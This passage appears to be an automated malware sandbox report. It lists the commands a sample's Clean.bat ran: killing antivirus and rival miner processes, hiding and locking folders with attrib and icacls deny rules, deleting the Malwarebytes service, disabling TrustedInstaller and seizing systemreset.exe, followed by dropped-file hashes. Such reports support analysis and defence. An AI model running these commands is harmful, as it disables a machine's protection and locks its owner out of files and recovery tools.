                                                                                                                                                                                                            TASKKILL /IM defender.exe /F
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:4488
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              TASKKILL /IM winmgmnt.exe /F
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:5176
                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                TASKKILL /IM hostdl.exe /F
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:4460
                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                  ATTRIB +H +S C:\Programdata\Windowsdata
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                  PID:5428
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls "C:\Programdata\Windowsdata" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5936
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                    TASKKILL /IM dlhosta.exe /F
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:3644
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\users\Admin\appdata\roaming\performance" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:5928
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\users\Admin\appdata\roaming\microsoft\windows\system" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:4596
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                    ATTRIB +H +S +R "C:\programdata\AudioHDriver"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                    PID:676
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\programdata\AudioHDriver" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                                                                    PID:5128
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                    ATTRIB +H +S +R "C:\programdata\AudioDriver"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:3516
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls "C:\programdata\AudioDriver" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:5496
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        TASKKILL /IM vshub.exe /T /F
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:860
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        TASKKILL /IM vsnhub.exe /T /F
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:3972
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          TASKKILL /IM erenhub.exe /T /F
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          PID:4912
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          TASKKILL /IM AudioHD.exe /T /F
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          PID:2004
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          TASKKILL /IM AudioDriver.exe /T /F
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:3668
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            TASKKILL /IM penapen.exe /T /F
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:3752
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                              timeout 1
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                              PID:684
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                              ATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\AudioHDriver"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:6120
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                ATTRIB +H +S +R "C:\Programdata\AudioDriver"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                PID:1344
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                ATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\Sysfiles"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                PID:404
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\Programdata\AudioDriver" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                                                                                                PID:5088
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\users\Admin\appData\Roaming\Sysfiles" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                                                                                                PID:3248
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\users\Admin\appData\Roaming\AudioHDriver" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:1448
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                TASKKILL /IM windowsdriver.exe /T /F
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:2000
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                TASKKILL /IM windowsdriver.exe /T /F
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:2868
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                  timeout 1
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                  PID:5892
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                  ATTRIB +H +S +R "C:\programdata\Windowsdriver"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:4992
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\programdata\Windowsdriver" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:3168
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                    ATTRIB +H +S +R "C:\Windows\WindowsDefender"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                    PID:2652
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\Windows\WindowsDefender" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    PID:2988
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    TASKKILL /IM bvhost.exe /T /F
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:3148
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                    ATTRIB +H +S +R "C:\users\Admin\appdata\roaming\bvhost"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                    PID:548
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\users\Admin\appdata\roaming\bvhost" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:3436
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    TASKKILL /IM nssm.exe /T /F
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:4560
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      TASKKILL /IM infodown.exe /T /F
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:5476
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        TASKKILL /IM infoweb.exe /T /F
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:2668
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        TASKKILL /IM windowsdeffenders.exe /T /F
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:5072
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                        icacls "C:\windows\syswow64\hhsm" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        PID:1436
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        TASKKILL /IM windir.exe /T /F
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:5912
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        TASKKILL /IM windir.exe /T /F
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:1792
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                          timeout 1
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:1100
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                          TASKKILL /IM lum.exe /T /F
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:2408
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                            TASKKILL /IM syslog.exe /T /F
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:3896
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                              ATTRIB +H +S +R "C:\users\Admin\AppData\Local\syslog"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:2100
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls C:\users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:4324
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                TASKKILL /IM wutphost.exe /T /F
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:5220
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  ATTRIB +H +S +R "C:\users\Admin\AppData\Local\wutphost"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:1804
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls C:\users\Admin\AppData\Local\wutphost /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:5488
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                  TASKKILL /IM "Audio Emulation System.exe" /T /F
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2548
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /IM winlg.exe /T /F
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:2148
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                    icacls C:\users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:2092
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /IM pythonw.exe /T /F
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    PID:2672
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /IM UsersControl.exe /T /F
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:5408
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    TASKKILL /IM WindowHelperStorageHostSystemThread118466.exe /T /F
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:1520
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    TASKKILL /IM WindowHelperStorageHostSystemThread100040.exe /T /F
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:428
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                      TASKKILL /IM WindowHelperStorageHostSystemThread106333.exe /T /F
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:2236
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                        PID:836
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                        TASKKILL /IM wup.exe /T /F
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                        PID:4588
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        ATTRIB +H +S +R "C:\users\Admin\AppData\local\temp\wup"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:4792
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls C:\users\Admin\AppData\local\temp\wup /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:5356
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls C:\users\Admin\AppData\local\temp\wup /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:5280
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          TASKKILL /IM intel.exe /T /F
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:4024
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                                                                                          PID:6132
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          TASKKILL /IM minergate-cli.exe /T /F
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:5336
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          TASKKILL /IM msvc.exe /T /F
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:4624
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                          ATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\Svcms"
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                          PID:2676
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls C:\users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:5624
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls C:\users\Admin\AppData\Roaming\Svcms /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                                                                                          PID:1772
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          TASKKILL /IM FileSystemDriver.exe /T /F
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:5964
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                            ATTRIB +H +S +R "C:\users\Admin\AppData\Local\FileSystemDriver"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                            PID:3756
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                            icacls C:\users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Possible privilege escalation attempt
                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                            PID:2456
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                            icacls C:\users\Admin\AppData\Local\FileSystemDriver /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:1472
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              TASKKILL /IM geckof.exe /T /F
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                              PID:4972
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                              ATTRIB +H +S +R "C:\users\Admin\AppData\Local\geckof"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                              PID:1748
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls C:\users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                                                              PID:2800
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls C:\users\Admin\AppData\Local\geckof /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                                                              PID:5296
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              TASKKILL /IM initwin.exe /T /F
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:4852
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls C:\users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                                                              PID:2804
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls C:\users\Admin\AppData\Local\initwin /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:1056
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              TASKKILL /IM packagest.exe /F
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                              PID:976
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls C:\users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:3488
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls C:\users\Admin\AppData\Local\packagest /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:3692
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              TASKKILL /IM ursb.exe /F
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:3156
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              TASKKILL /IM hssvc.exe /T /F
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:3376
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              TASKKILL /IM xmrig.exe /T /F
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:5180
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                icacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                PID:3780
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                TASKKILL /IM pythonw.exe /T /F
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                  gpupdate /force
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1668
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                    taskkill /IM CPU.exe /T /F
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:4380
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                      sc config trustedinstaller start= Disabled
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                      PID:5940
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                      sc stop mbamservice
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                      PID:3840
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                      timeout 1
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                      PID:2248
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                      sc delete mbamservice
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                      PID:2228
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                      takeown /f c:\windows\system32\systemreset.exe
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                      PID:3228
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                      icacls c:\windows\System32\systemreset.exe /setowner Admin
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:3952
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                        icacls "c:\windows\System32\systemreset.exe" /grant:r Admin:F
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                        PID:3516

                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                • C:\ProgramData\microsoft\Temp\Clean.bat

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  35KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  dad58eed25efd2b546df6c00a3a8f2de

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  ebfadd893b3c180d9bae609426b54e2b9e1031bc

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  833584a88f27a0032168635ada5328c37645d103d8839a49e2e69765b9709747

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  ae72c0d3752fed32b63cb5fed9f47a5b9d08ecef50fa4c5219e11fce2e7c7e4f8a1def20cb9335e9cb27635591dfe034334c6a37fccc39ba68b7551ed224ad38

                                                                                                                                                                                                                                                                • C:\programdata\microsoft\temp\Clean.vbs

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  149B

                                                                                                                                                                                                                                                                  MD5

